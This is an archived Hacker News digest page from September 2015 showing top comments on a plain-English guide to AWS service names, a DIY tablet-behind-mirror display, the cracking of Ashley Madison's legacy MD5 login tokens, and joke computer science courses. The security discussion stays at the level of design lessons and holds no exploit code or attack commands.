hacker news with inline top comments    14 Sep 2015 Best
Amazon Web Services in Plain English expeditedssl.com
1441 points by ins0  2 days ago   221 comments top 52
michaelbuckbee 2 days ago 16 replies      
Hey HN, I wrote this, thanks for all the feedback. In particular if I've mischaracterized the functionality of a service or you see something that's really off please email me at mike@expeditedssl.com or just tell me here and I'll fix it.
junto 2 days ago 1 reply      
What's amazing is the number of services Amazon offers.

Whenever I look at my AWS console I see these reams of badly named services and I think to myself

 "after I've dealt with the current problem for which I've logged in to AWS, I might get to figure out what all that other stuff actually is". 
However, I never do because there is more stuff to take care of, and since AWS doesn't make this easy to understand, you just don't bother. Now I know that AWS actually has some really useful stuff, including things I would never have considered using Amazon for, like video processing (Elastic Transcoder), source control (CodeCommit) and OAuth as a service (Cognito).

They just seem to be bad at marketing their stuff. Here's an example: https://www.google.de/search?q=source+code+repository+online...

Why isn't CodeCommit here on the first page of the search results?

hopeless 2 days ago 2 replies      
Love this! Loved it so much I made it into a tampermonkey script: https://gist.github.com/ideasasylum/2d7518611ffaacbc5061

So now my Amazon dashboard looks like: https://dl.dropboxusercontent.com/s/iko1p8jdwdvjpaq/2015-09-...

timclark 2 days ago 3 replies      
"It's like: Stacking cash on the sidewalk and lighting it on fire"

Is an accurate description of a large number of products that I have been forced to use after various CTOs have played golf with a vendor's sales team.

kevindeasis 2 days ago 1 reply      
It took me forever to understand what each service aims to do. I could literally have been a better programmer by spending all that time learning algorithms instead of figuring out what each of the AWS services does. I wish I'd had access to this post before.

I like the services they offer, I just really hate the names they gave them. Funny enough, Jeff Bezos said in an interview that the name of a product is important #irony

stephenr 2 days ago 5 replies      
Let me preface this by saying I use AWS only when clients insist on it. I think there are much better options that don't lock their customers in anywhere near the same amount.

I think AWS has plenty of badly named services, but some of these suggestions are much worse (and have a huge American influence - that fascination with using brand/implementation names for a generic/standard item) than the current actual AWS names:

* Amazon Unlimited FTP Server - why? ftp is a transfer protocol. S3 is about storage. It should be called Amazon Storage Server. Which it basically is (Simple Storage Service - S3)

* Amazon Memcached - I don't use the service so I don't know if it's only binary compatible with memcached, but if it's a generic cache that has multiple interfaces (the page references Redis too) then a more generic term like "cache" (and "elastic" implies it can grow/expand) seems more logical.

* Amazon Beginning Cut Pro - wtf. Transcoding is literally the process of converting a file from one type of encoding to another. That seems to be what this does. Final Cut Pro is not a mere format converter, it's a non-linear editor.

* Device Farm - I'll only concede that maybe this should reference mobile devices, but the name seems pretty clear and concise.

* CodeCommit - how is "code commit" less clear than "github"? By this logic, Apple's email client should be called "Apple Outlook" because Outlook was a well-known email client on the market.

* EC2 Container Service - the reference to EC2 makes it slightly non-obvious, but Amazon Container Service would be much better than something referencing Docker. Docker !== Containers.

* WorkDocs, WorkMail - seriously, you're just replacing "Work" with "Company" here.

* Storage Gateway - what, are you trying to be obtuse? From your very description, this sounds like exactly what the name describes - a local gateway to a storage service.

* Elastic Map Reduce - the compute/processing part of Hadoop is Map/Reduce. How is "Hadooper" more clear than the current one?

* Machine Learning - you're just being facetious now, right?

* OpsWorks - again, why does their name have to reflect a single specific implementation of a fairly well understood term(s) - Operations, DevOps, etc??
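For anyone who hasn't met the term the Elastic Map Reduce bullet is arguing over: the map/reduce model itself fits in a few lines of Python. This is an illustrative toy, nothing like how Hadoop or EMR actually distributes work:

```python
from collections import Counter
from functools import reduce

lines = ["the quick fox", "the lazy dog"]

# Map step: each record is processed independently
# (this is the part a cluster parallelizes across machines).
mapped = [Counter(line.split()) for line in lines]

# Reduce step: combine the per-record results into one.
counts = reduce(lambda a, b: a + b, mapped, Counter())
# counts["the"] == 2; every other word appears once.
```

The real systems add partitioning, shuffling and fault tolerance around exactly this map-then-fold shape.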

edit: typos

jlebar 2 days ago 1 reply      
I have to say that I think "glacier" is an inspired name. It takes a negative -- slow data retrieval -- and turns it into a positive -- indestructible, huge, unstoppable.
unoti 2 days ago 3 replies      
When you're building a new app based around a handful of these services, how do you have any idea what it will cost to host your business as a startup? In the past I've avoided using these and just used VPS servers, doing my own thing, because it's really hard for me to, for example, guess how many database queries I'll do or how many messages I'll send between app components. I feel much safer saying that I can limit myself to N servers with so much memory. How do you make that jump to thinking the other way?
acre88 2 days ago 1 reply      
Sad that this is necessary, but glad someone did it. There are AWS services listed here which when explained this way I realize I might want to take advantage of.
michaelborromeo 2 days ago 3 replies      
Thank you for this.

I can't wrap my head around why Amazon would make names for some very useful services so inscrutable.

It's like the developers were put in charge of naming everything.

snorkel 2 days ago 3 replies      
Whoa errors!

* S3 is not FTP. It's more like static web hosting and storage.

* VPC is not a "colocated rack" as it doesn't offer physical placement of hardware. Amazon VLAN would be a better name. It's just private network address space.

czzarr 2 days ago 1 reply      
This was orders of magnitude more helpful than the thousands of words that describe AWS on the AWS website. Thank you.
byron_fast 2 days ago 1 reply      
Excellent! You seem to have overlooked "Elastic Block Store" which should be called "Disk".
pierceg 2 days ago 0 replies      
This is gold.

I wrote a quick and dirty chrome extension that adds these names to the dashboard:https://github.com/pierceg/Amazonese

sbt 2 days ago 2 replies      
So many ways to make your software depend on Amazon.
rburhum 2 days ago 1 reply      
The Direct Connect description is gold: "It's like: Stacking cash on the sidewalk and lighting it on fire"

Pretty spot on...

angry_octet 2 days ago 4 replies      
I can't agree. This is like all those people who wasted money buying shop.com and tv.com, when all the recognition is in ebay.com and youtube.com. If you listen to people talk about cloud services they say "competitor X's S3 clone"; AWS owns the terminology.

Also, S3 is NOT some FTP service, it is a new concept. And why should they call CloudFront "Amazon CDN" instead? Anyone using it knows what a CDN is and what CloudFront is. It's like insisting Toyota call the Camry the Toyota Mid Size Car.

fenomas 2 days ago 1 reply      
Awesome. I wish there was a column to tell you Google's version of the same service, where applicable.
matthewrhoden1 2 days ago 0 replies      
This is awesome! I spent probably an hour or two yesterday wading through all of it to figure out exactly what each piece does. This make it really clear.
arbuge 2 days ago 1 reply      
SES is great for newsletters. We use it for that all the time. Not sure why this article concludes it's only a good idea for transactional email.
dankohn1 2 days ago 1 reply      
Has AWS deprecated any of the services they've launched? If not, isn't that almost unprecedented in the worlds of both enterprise software and SaaS?
wonjun 2 days ago 0 replies      
Thank you, such a great post, I'd like to try getting a certificate from expeditedssl on AWS next.
mcherm 2 days ago 0 replies      
This guide is surprisingly helpful. Oh, but Glacier (not a bad name, actually) should be "Amazon Storage for Backups".
colordrops 2 days ago 3 replies      
What should Lambda be called?
halfelf 2 days ago 0 replies      
Thanks for sharing. It feels like I've just put on magic glasses that auto-translate.
tragomaskhalos 2 days ago 1 reply      
Some of these names make you wonder if Amazon are more in love with their own cuteness than in actually getting people to use their stuff - "Elastic Beanstalk" FFS? Either way, Bezos should hire the author of this piece and make him product-naming czar.
ukd1 2 days ago 0 replies      
The SWF description is pure garbage; it's got nothing to do with EC2 or IronWorker at all. Oddly, I think it's named sanely - it lets you set up and manage a workflow using small bits of code.
ausjke 2 days ago 1 reply      
Lovely and really helpful. I've used some AWS but never fully understood the rest of the services. Amazon really should have a 101 page for this on its own. Those names are painfully opaque, to say the least.
Gys 2 days ago 0 replies      
Yes ! I need Plain-English-As-A-Service or maybe just Amazon-As-A-Service
tdebroc 2 days ago 0 replies      
Nice one: Machine Learning - should have been called Skynet.
cdnsteve 2 days ago 1 reply      
The fact that their service portfolio has grown so large that you need a guide to navigate through it is very telling. Has AWS grown too vast?
mattress 2 days ago 0 replies      
Why didn't I read this earlier?! I was at an AWS hackathon all day and it was my first time ever using any of their offerings. This would have been super useful.
edpichler 2 days ago 1 reply      
Why do people like to describe services in a complex way? Maybe to make the product seem more complex than it really is, or to look like "specialists" speaking about the stuff.

This is very common for small companies without marketing experience, but I can't understand it happening at companies like Amazon and Microsoft (Azure).

lazyant 2 days ago 0 replies      
One of the good things about this is that the next time somebody compares AWS to a regular ISP's VMs, we can point at this to show that EC2 alone may not compare favourably; it's the other services in the vast AWS ecosystem that bring the value.
ximeng 2 days ago 0 replies      
How would you describe it in a few words (in keeping with the theme of the piece)?

Where's the main danger, as you see it?

PuerkitoBio 2 days ago 0 replies      
Would be nice if the services' header linked to the official AWS product page.
rmason 2 days ago 0 replies      
Now if someone would write a book translating Linux commands into plain English it would be a best seller. Or in other words explain it like you would to an experienced Windows user.
wil421 2 days ago 0 replies      
Great post. Some of this stuff has been a mystery to me. Probably one of the reasons I use Digital Ocean. For my personal needs a simple VM will do, and they even let me attach my keys before instance creation.
leoalves 2 days ago 1 reply      
DynamoDB is nothing like MongoDB. It's more like a key/value database.
tomcampbell 2 days ago 0 replies      
Amazon literally should pay you for this. I will be signing up for some additional services now that I know what they are. Thank you.

Also, love the light application of humor.

taivare 2 days ago 0 replies      
Frustrating for the beginning developer: I could not even clearly see if they had an in-house service for image hosting, or whether "images3" is their brand or 3rd party!
hmate9 2 days ago 0 replies      
Love it. Keep it simple. It is too often the case that writers assume their readers have the same knowledge as they do. Always assume your reader knows nothing.
disbelief 1 day ago 0 replies      
Possible alternative "should have been called" for Glacier: "Amazon Write Only S3"
explosivo2k2 2 days ago 1 reply      
This is great. One note: "injest" should be ingest.
ycosynot 2 days ago 0 replies      
It makes me think that eventually technology will be so vast, there will be a need for a 'Google Translate' of such terms.
mokkol 2 days ago 0 replies      
Such an awesome list. Really helpful! Thanks a ton!!
brixon 2 days ago 0 replies      
Best One:

It's like: Stacking cash on the sidewalk and lighting it on fire

kelukelugames 2 days ago 0 replies      
This should be added as a new language in Google Translate.
nu2ycombinator 2 days ago 0 replies      
Lambdas are missing
benjarrell 2 days ago 0 replies      
Is there something like this for Heroku?
adultSwim 2 days ago 0 replies      
Thank you
Show HN: Make a programmable mirror github.com
1139 points by hannahmitt  2 days ago   131 comments top 49
davnicwil 2 days ago 2 replies      
What an absolutely awesome idea. I love things like this that just blend software and information into the physical environment seamlessly.

I see stuff like this and just think, yeah, now we're living in the future :-D Kind of reminds you how cumbersome and inappropriate it can be to have to pull out a dedicated black slab of glass to access all your information.

The future (at least the one I want) without a doubt is information distributed throughout and blended with the rest of the 'physical' environment so it can be accessed in a truly interactive, head-up manner, not always funnelled and filtered through a singular device - be that VR, AR, or just a load of nicely designed physical interfaces like this one.

servercobra 2 days ago 7 replies      
I'm guessing this is based off [1] which uses a normal monitor and a Raspberry Pi.

This one looks much quicker and simpler than [1], but what if you need to do anything to the tablet (updates, a new app, etc.)? Remove it and re-apply the adhesive?

Personally, I've been working on doing the same with an RPi and Hover so I can wave my hand in front of the mirror to swipe to new screens/info.

[1] https://www.raspberrypi.org/blog/magic-mirror/

lazaroclapp 2 days ago 5 replies      
Does the device's camera work from behind the one-way-mirror? Specifically, does the device camera work well enough from behind the one-way-mirror to do accurate face recognition? (the idea being that it can display different information for different users and have at least a soft "biometric" privacy lock).

Also, would color images be displayable through the one-way mirror, or will only white come through intact?

swamp40 2 days ago 1 reply      
Looks perfect for daily affirmations.

"Good morning, Dave. MY, you look handsome today!"

Kiro 2 days ago 1 reply      
This needs a Kickstarter. I would back it immediately.
nivla 2 days ago 0 replies      
Nice work! I first came across this concept a few years back when someone posted an Instructable in which, I believe, he was building a magic mirror for his daughter [1]. I re-implemented the idea but with a spooky tone, i.e. it is framed as a regular mirror in the living room, and when a guest stares at it long enough, something spooky jumps into view. This was done using a VGA monitor, a camera and a netbox PC. It was a fun project. If I were to go at it again, I would just use a cheap Android tablet, solely based on price, simplicity and power consumption. I would also make it useful this time by displaying data that interests me rather than a novelty toy.

[1] http://www.instructables.com/id/The-Magic-Mirror/

barcoder 1 day ago 1 reply      
Here's a face tracking version I made a couple of years back: https://vimeo.com/13156714

It just uses a webcam and detects faces with the (now obsolete) Haar cascade face-detection algorithm.

rmxt 2 days ago 1 reply      
This is really neat, but not having a spare Android tablet lying around, I'm left wondering: is there any cost-effective way to magnify a small screen, say that of an SGS3, to a larger size? Anyone have any tricks of light, like angled mirrors or prisms, up their sleeves to achieve such an effect in a thin depth? I don't get the impression that resolution is all that important if all it's going to be used for is a few lines of monochrome text and symbols.
pwnna 2 days ago 2 replies      
This is really cool! Although the title could be better: initially I thought this was talking about mirrors that can be programmed to adjust their properties (like tilt, curvature), much like those fancy telescope mirrors, though I'm unable to find a link now.
eflowers 2 days ago 1 reply      
That weather readout would look great with some slick weather icons:


mikado 2 days ago 0 replies      
We made a similar project last year with voice control.


pierrec 2 days ago 0 replies      
I wonder if a touchscreen version is doable using the frustrated total internal reflection technique [1]. Relatively cheap projects have been done with that technique, but never with a mirror, AFAIK.

It's somewhat different since it requires a sizable box behind the surface and an internal projector instead of the screen. As for turning it into a mirror, it might be as simple as adding a two-way mirror under the Plexiglas pane (or possibly between the pane and the diffuser layer). But this is where experimentation becomes necessary!

[1]: http://cs.nyu.edu/~jhan/ftirsense/

natebleker 2 days ago 2 replies      
It would be really cool to add facial recognition at like 0.5hz to the phone so that it only turns the screen on when you're looking at it. Or alternatively customize the content based on who's present in front of the mirror.
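The low-rate polling this comment describes could be sketched as below. `detect_face` and `set_screen` are hypothetical stand-ins for whatever vision library (e.g. an OpenCV Haar cascade) and display backlight API you actually use:

```python
import time

def mirror_loop(detect_face, set_screen, poll_hz=0.5, cycles=None):
    # Poll at a low rate (the comment suggests 0.5 Hz) and only light
    # the screen when someone is actually in front of the mirror.
    done = 0
    while cycles is None or done < cycles:
        set_screen(on=detect_face())
        time.sleep(1.0 / poll_hz)
        done += 1

# Demo with stubbed hardware: record what the screen would do.
screen_states = []
mirror_loop(
    detect_face=lambda: True,
    set_screen=lambda on: screen_states.append(on),
    poll_hz=50.0,   # fast polling just for the demo
    cycles=3,
)
```

Swapping `detect_face` for a per-user face recognizer would also enable the "different content per person" idea.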
jgh 2 days ago 2 replies      
On first glance I thought the mirror said "Wear pants today" as if the mirror should know whether or not my legs will get cold...
userbinator 1 day ago 1 reply      
A few years ago it was really popular for home entertainment electronics like stereo systems and DVD players to use this trick to make the display appear to be "floating" on a mirrored surface. (Example: http://regmedia.co.uk/2011/07/21/philips_bdp7600_blu-ray.jpg ) More recently, I've seen people with phones whose screen protector is made out of this material.

(Personally, the idea of putting a device with a camera and microphone behind a two-way mirror just feels a bit too much like a telescreen for me.)

knowaveragejoe 2 days ago 2 replies      
I wish this went into a bit more detail about working with the mirror itself. Do you actually need a 2-way mirror? Or can you simply use something with that coating on one side?
roberthahn 1 day ago 1 reply      
If you want to build an interactive programmable mirror, looks like Nanogest might be useful: http://www.nanocritical.com/nanogest/ It's available for both iOS and Android.

It recognizes 4 swipe gestures (top, down, left, right) and a wave gesture.

It's a library so you'd still have to build the information display part.

resc1440 2 days ago 0 replies      
Might want to electrical-tape over the phone's front-facing camera, and maybe even excavate out its microphone. Just In Case.
soared 1 day ago 0 replies      
I did something similar, but used Windows 10 and Rainmeter, which lets you place widgets/images on your desktop. https://i.imgur.com/LKxxvVI.jpg

reddit thread: https://www.reddit.com/r/Rainmeter/comments/3hzy4b/something...

andrepd 2 days ago 0 replies      
Great idea! It's stunning how this sort of futuristic seeming technology is actually possible using $50 in consumer electronics!

But passive display of information is only part of the story. You have the hardware: a microphone and a speech recognition API. Build voice interaction with this. Even simple commands like "Show me the weather tomorrow", or "Show me my calendar" add an amazing new depth to it. I can imagine myself, shaving and idly telling my mirror to show me my appointments today. :)

Animats 2 days ago 0 replies      
Decades ago I saw this done for auto rear-view mirrors, at Ford's research lab in Dearborn. Way ahead of its time.

If you have to operate electronics in a damp environment, use "Fine-L-Kote" conformal coating on the electronics. Mask all connectors, switches, and the screen face itself, then spray. Inspect with a UV light to see if you missed anything. Most automotive electronics gets a conformal coat, but, annoyingly, most handheld devices do not.

knightofmars 2 days ago 0 replies      
I did some research into two way mirror vendors a while ago to hide my TV and stumbled upon this operation out of Ohio. I never ended up finishing the project and as such never ordered from them so I don't know much about the company. They do have a wide range of two-way mirror options.


devonoel 2 days ago 1 reply      
Really cool idea, but more importantly, why do some people call a one-way mirror a two-way mirror? It's only a mirror on one side.
pavel_lishin 2 days ago 2 replies      
I wonder if humidity and steam would be a problem if this was done in a bathroom.
mundo 2 days ago 0 replies      
Super cool! Looks like a great anniversary present for the missus. I'm comfortable doing android development, but for those that aren't, have you thought of adding some config buttons for setting the birthdays and whatnot and releasing it in the google store?
adanto6840 2 days ago 0 replies      
Not sure if it's this article or not (wouldn't surprise me), but there's a number of "one way mirror" plastic/acrylic sheets on Amazon, with Prime shipping. But all of the larger, more practical ones are sold out as of a few minutes ago, hah. ;-)

Awesome project.

codingdave 2 days ago 0 replies      
I do like this. It is clever.

But when I did something similar for my family, which displayed everyone's chores for the day, and any events we had going on, I simply mounted a tablet on the wall of the kitchen, and wrote a web page to display the info.

jonknee 2 days ago 0 replies      
Years ago I stayed in a hotel that had mirrors like this by the elevators. They were displaying the current weather and the day's forecast, I believe. I've wanted one ever since!
seangarita 2 days ago 0 replies      
This is really cool!

I built one of these with Facial Recognition for my Capstone project. http://lookingglass.co

mholt 2 days ago 0 replies      
This is way more affordable than the same thing I saw at Harrod's for like $10,000. Awesome project! Can't wait to try this.
suyash 2 days ago 1 reply      
Ask HN: Absolutely the coolest thing I've seen in a while. Can someone explain how the phone screen is being displayed in the mirror? It's behind the mirror, not in front of it, right? Since the mirror won't register touch, there is no touch-based control and one needs to pull the phone out to change apps etc., right?


danpeddle 1 day ago 0 replies      
Great idea! Repurposing old tablets / mobiles is the cherry on top. Fascinating how combining otherwise dumb material with smart technology produces something so compelling.
joshmn 2 days ago 0 replies      
Love this idea, but removing the device (if you have to) is what rubs me the wrong way.

Anyone have any idea of the implications of mounting the device, say, 3mm away from the mirror? I think that would be about the depth of a case... and if you mount it inside a case, you can remove it seamlessly.

jscheel 2 days ago 2 replies      
I've been working on a voice-controlled one of these. I just got my Raspberry Pi, but am still working on the software side quite a bit. I'm not really having great success with CMU Sphinx's hotword detection.
brunorsini 2 days ago 2 replies      
Any suggestions for stores similar to Canal Plastic Center in San Francisco?
aakilfernandes 2 days ago 2 replies      
Pretty cool. I'd want to try this out on a kindle paperwhite and see if it would work.

How obvious is the rectangle of light? I can't see it at all in the first pic, but can make it out a little in the last pic.

epalmer 2 days ago 1 reply      
This is a project I could get into. Full maker mode on. I like the details provided and the images. I'm thinking about using a display other than an Android phone since I don't have one.
gus_massa 1 day ago 0 replies      
I'd like the "consider no biking" message to show the bike image with a strikethrough.
maresca 2 days ago 0 replies      
I have an old nexus I don't use often and would like to attempt this. Anyone know of any good mirror suppliers in the south jersey/philadelphia area?
thehooker 2 days ago 0 replies      
This is awesome!

It would be nice if this mirror could sync with your main device using wi-fi. So it would always be up-to-date with your stock options, birthdays and stuff like this.

swah 2 days ago 0 replies      
Can the "two way mirror" be created with "reflective window tint" (insulfilm in Brazil) glued onto a transparent acrylic sheet?
msie 2 days ago 0 replies      
Would using an iPad Pro be overkill?
alwaysdoit 2 days ago 0 replies      
Does the tablet's touchscreen work through the mirror, or is this read-only?

It's still really cool either way.

kevinaloys 2 days ago 0 replies      
This is absolutely fan fucking tastic!!
zekenie 2 days ago 2 replies      
I wonder how this would work with the new Raspberry Pi display
huangc10 2 days ago 1 reply      
looks awesome! is that an iron ring I see?
cm2187 1 day ago 0 replies      
Heavily influenced by Snow White!
g10r 2 days ago 0 replies      
very awesome!
How we cracked millions of Ashley Madison passwords cynosureprime.blogspot.com
371 points by ctz  3 days ago   166 comments top 16
djrogers 3 days ago 8 replies      
The real lesson here is that when you fix your mistakes, go back and fix them retroactively!

AM used an insecure login token at one point, and 3 years ago they fixed it. They switched from an MD5 of lower(pass)+username to an MD5 of the bcrypted pass+username, which is no longer trivially crackable.

Apparently they never updated all of the previous login tokens though, so anyone who had created an account before the new secure system was put in place still had a vulnerable token stored.
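A rough sketch of the before/after token schemes described above. The function names and exact concatenation order are illustrative assumptions, not AM's actual code; the point is the case-folding plus fast hash in the old scheme:

```python
import hashlib

def legacy_token(username: str, password: str) -> str:
    # Pre-fix scheme: MD5 over lower(password) + username. Lowercasing
    # collapses the password keyspace, and MD5 is fast enough to
    # brute force at billions of guesses per second.
    return hashlib.md5((password.lower() + username).encode()).hexdigest()

def fixed_token(username: str, bcrypt_digest: bytes) -> str:
    # Post-fix scheme: MD5 over the stored bcrypt digest + username.
    # Recovering the password now means cracking bcrypt first.
    return hashlib.md5(bcrypt_digest + username.encode()).hexdigest()
```

Note how the legacy token is case-insensitive in the password, which is part of what made the crack cheap: `legacy_token("bob", "Secret1")` equals `legacy_token("bob", "sECRET1")`.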

When it comes to security, when you fix something - fix it for everyone people! Even if it's hard.

The good news for these folks is that the passwords revealed appear to be over 3 years old, and we all change our passwords more often than that, right????

jand 3 days ago 1 reply      
As a non-native speaker, could you please confirm or correct my understanding of this interesting text:

1. They attacked some login/api-token unrelated to bcrypt.

2. If I use bcrypt-validate for logins and only temporarily associate rotating, random login/api-tokens with an account, I should not be prone to such attacks.

Thank you very much for your help.

snowwolf 3 days ago 6 replies      
The title of the article should really be changed to "How we cracked millions of Ashley Madison passwords by bypassing their strong bcrypt hashes because they thought they were clever", but that's less clickbaity.

Also, never ever roll your own encryption - it will be flawed (unless you employ at least 3 crypto experts and get it peer reviewed - and even then it's probably still flawed).

dsp1234 3 days ago 2 replies      
I recently found out that piwik also uses a login token of the MD5 of the password[0]. So this mistake is still very prevalent.

If you want to provide a one-click automatic login to Piwik for your users, you can use the logme mechanism, and pass their login & the md5 string of their password in the URL parameters:


[0] - http://piwik.org/faq/how-to/#faq_30

nly 3 days ago 0 replies      
Don't worry. One day we'll have a standard for web login using hard hashes and solid PAKE protocols. Right? ...right?

Nevermind then, let's go back to berating sysadmins for implementing crypto improperly.

flipp3r 3 days ago 1 reply      
tl;dr they had a bad implementation and used md5 previously
nilved 3 days ago 7 replies      
What's the risk of using plaintext passwords if we assume every user is employing long, random, unique passwords? This has always seemed like a non-issue to me because I've been using a password manager for a half-decade.

e: Downvoting questions is mean. FWIW I always use bcrypt.

lostgame 3 days ago 2 replies      
I used to work for these guys. Their CEO was probably the single most selfish douchebag I'd ever met.

Glad this happened to them. 'bout time Karma came a'knocking.

Oh, p.s. can confirm all women (at least 90%) are bots.

tempVariable 3 days ago 1 reply      
It's like protecting your business with industrial-grade door locks on a building made of hay. Just a whole lot of cheating going on over there, ouch.

edit: I don't know if this came up before, but based on how they stupidly tried to cache the login session tokens with MD5 instead of running them through the work-factor-12 bcrypt, I can assume that they saw this as a bottleneck.

Instead of dropping the work factor or doing this caching baloney, could a service be made that runs on extravagantly fast hardware and provides an API for strong, high-work-factor bcrypt- or PBKDF2-based authentication?

I can assume that at around 10 rounds, each attempt takes about 50 - 100 millis
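The cost trade-off in the comment is easy to put in numbers: bcrypt's key setup runs 2**work_factor times, so each increment doubles the time per hash (and per attacker guess). A small sketch, using the commenter's 50-100 ms figure (75 ms is an assumed midpoint; real timings depend entirely on hardware):

```python
def relative_cost(work_factor: int) -> int:
    # bcrypt's expensive key setup runs 2**work_factor rounds, so each
    # +1 to the work factor doubles the time per hash and per guess.
    return 2 ** work_factor

def est_ms_per_hash(work_factor: int, ms_at_10: float = 75.0) -> float:
    # Scale from an assumed ~75 ms at work factor 10.
    return ms_at_10 * 2 ** (work_factor - 10)
```

Going from factor 10 to 12 quadruples the per-login cost, which is exactly the pressure that tempts people into MD5 "caching" shortcuts.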

Thoughts?

grandalf 3 days ago 0 replies      
> This meant that we could crack accounts created prior to this date with simple salted MD5.

This means that there was a decision not to force previously created accounts to update their passwords to make their accounts more secure.

Contrast this with the big Evernote vulnerability where all users were required to reset their passwords.

aruggirello 3 days ago 1 reply      
One point is not clear to me: did the crackers know the $usernames already, or did they perform some kind of dictionary attack? Brute forcing both $username and $password out of millions of hashes seems a bit hard, even considering MD5 trivial and no HMAC scheme being employed.
wbhart 3 days ago 4 replies      
The domain name appears to be an anagram of Sony Pure Crime.
chinathrow 3 days ago 2 replies      
I abandon any sites which give me direct logins via URLs sent over plain text emails.

I know, password reset keys are as bad as login keys, but usually they expire after a certain time frame.

F*ck login keys.

sparkystacey 3 days ago 0 replies      
It would be awesome if some data scientist took the list of passwords and figured out the top 100 for cheaters.
amelius 3 days ago 1 reply      
The article assumes that the reader knows what MDXfind is. Can somebody explain? Is it a brute force tool?
Computer Sciences Courses That Don't Exist, but Should dadgum.com
407 points by Scramblejams  3 days ago   244 comments top 44
insaneirish 2 days ago 9 replies      
Can I add another one? How about "The Network Doesn't Work The Way You Think It Does: A Distributed Systems Survival Guide".

As someone who has spent a good chunk of their career building high performance networks and another chunk of it working closely with developers who care a lot about those networks, I'm constantly amazed at how little top tier graduates from well respected schools know about networks.

Relatively basic stuff - like what your application's traffic looks like on the wire, how an OS determines what to do with a packet, and how latency affects applications - is completely foreign to way too many developers. I could go on and on, but given the connected nature of things today, it seems like a very overlooked area.
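The latency point deserves a number. Sequential round trips multiply, which is invisible on localhost and brutal over a WAN; a back-of-the-envelope sketch (the RTT figures are illustrative assumptions):

```python
def sequential_request_time_ms(requests: int, rtt_ms: float,
                               server_ms: float = 0.0) -> float:
    # Each sequential request pays a full network round trip, so total
    # time scales with RTT, not just with server-side work.
    return requests * (rtt_ms + server_ms)

# 100 chatty sequential queries: fine on a LAN, painful cross-continent.
lan_ms = sequential_request_time_ms(100, rtt_ms=0.5)   # 50 ms
wan_ms = sequential_request_time_ms(100, rtt_ms=80.0)  # 8000 ms
```

Same code, same server: the 160x difference is pure network, which is why batching and pipelining matter.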

bliti 2 days ago 3 replies      
CSCI 0666: Implementing Reverse Binary Trees on whiteboards.

CSCI 0123: Implementing Monads in COBOL

CSCI 0555: Successfully correcting internet commenters.

CSCI 0556: Nitpicking points made in CSCI 0555.

CSCI 0777: Introduction to twitter bot polynomial time algorithms with an emphasis on winning shitty contests.

CSCI 0911: Learning functional programming with Haskell.

CSCI 0912: How to come up with uses for knowledge acquired in CSCI 0911.

fizixer 2 days ago 2 replies      
Okay, time to upset people:

Dear 'All CS Departments of the World':

Please stop fooling your students in the 'Intro to Algorithms' class, and just rename it to 'Intro to Combinatorial Algorithms'. Because that's what you teach, and you completely ignore the arguably bigger area of 'Intro to Numerical Algorithms'. Numerical algorithms are not only the basis of pretty much every branch of computational science (comp. physics, comp. chemistry, comp. biology, comp. civil engineering, comp. mechanical eng., comp. electrical eng., comp. economics, comp. statistics, and on and on), but also one of the weakest links for a CS graduate transitioning to Machine Learning and Data Science.

Or you could keep the course title, but upgrade the class, by teaching 50% of it as 'Algorithms and Data Structures', and 50% as 'Numerical Methods and Scientific Computing'.

Unrelated to above but relevant to the thread: Allen Downey and his team at Olin College are doing things worth looking into. (His Google techtalk: https://www.youtube.com/watch?v=iZuhWo0Nv7o)

WestCoastJustin 2 days ago 5 replies      
How about "Building an End-to-End Software Solution - 101". Going through the entire development workflow (idea, design, prototype, beta release, delivery, and iteration). One of my good friends is currently going through school, but in the back of my head there is this nagging thought that he will not learn what's needed for today's market.
ctdonath 2 days ago 5 replies      
CSCI 1200: Debugging

Seriously. This should be a full subject addressed in detail, and early, unto itself. Instead it's typically a sink-or-swim byproduct of trying to pass any other science/engineering class.

stormbeard 2 days ago 5 replies      
Seriously though, it's probably time to separate Computer Science and Software Engineering into different routes of study.
blt 2 days ago 1 reply      
It's not enough to fill a class, but I really wish school had taught me about linkers, dynamic libraries, and calling conventions. AKA "why must I use this old compiler to link against this old closed-source C++ library?"
arfar 2 days ago 8 replies      
>UNIX "ls" tool is a case study in excessive command line switches.

'ls' is a bag of weird (bad?) UX. When first starting on the command line, I could never figure out how grepping the output of ls actually worked. Then I think I looked at some of the code, or someone told me, that when ls outputs, it checks where the data is going: if it's a terminal it pretty-prints columns (and probably other things), otherwise it just uses the saner one-line-per-item format.
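What the parent describes is typically an isatty() check on stdout. A rough Python imitation of the behavior (a sketch only; ls itself is C and does considerably more):

```python
import os
import sys

def list_names(names):
    """Mimic ls output: columns on a terminal, one name per line when piped."""
    if not names:
        return
    if sys.stdout.isatty():
        # Interactive terminal: pack names into columns, as ls pretty-printing does.
        width = os.get_terminal_size().columns
        col = max(len(n) for n in names) + 2
        per_row = max(1, width // col)
        for i in range(0, len(names), per_row):
            print("".join(n.ljust(col) for n in names[i:i + per_row]))
    else:
        # Piped (e.g. into grep): the saner one-line-per-item format.
        print("\n".join(names))
```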

Tloewald 2 days ago 2 replies      
Unlearning Object Programming might include discussion of the legitimate uses of global variables, and how Singletons are just obfuscated and inconvenient globals.
yakult 2 days ago 2 replies      
How To Prevent Scope Creep Without Alienating Your Boss Or Other Important People
piyushpr134 2 days ago 2 replies      
How about
1. Version control systems and how to use them always
2. Practical introduction to SQL and NoSQL databases
3. Database schema design along with practical projects
4. Introduction to HTTP
5. Introduction to Web frameworks
6. Introduction to mobile development
7. Mobile app design basics
8. How to clear job interviews


jnpatel 2 days ago 0 replies      
> Includes detailed study of knee-jerk criticism when exposed to unfamiliar systems.

This hits home.

thinkingfish 2 days ago 3 replies      
CSCI 4035: Refactor Your Own Term Projects from Past Semesters
solomatov 2 days ago 2 replies      
I think another course should be CSCI 9000: How not to be an opinionated jerk.
xacaxulu 2 days ago 1 reply      
Maybe just a CS program staffed entirely by people who've had real CS jobs outside of the academia bubble.
notacoward 2 days ago 1 reply      
CSCI 2020: How to Store Data

Discover the fascinating differences between fflush, fsync, and data actually hitting disk. Learn why single-byte writes are a dumb idea, and why accessing data through a cheap one-gigabit switch might not be as fast as accessing it locally. As preparation for being actual storage developers, students will be blamed for the professor's own mistakes, and for every problem that happens anywhere else in the system.

andrewstuart 2 days ago 1 reply      
How about "Programmer psychology: recognising and dealing with your own dogmatism through to diplomatically dealing with the dogmatism of other programmers."
thetruthseeker1 2 days ago 0 replies      
I am a software engineer, and I have a grad school degree in CS with many years of experience in the industry. One thing I often noticed was that many people break key computer science concepts in pursuit of minor usability improvements or some other minor goal such as code reuse.

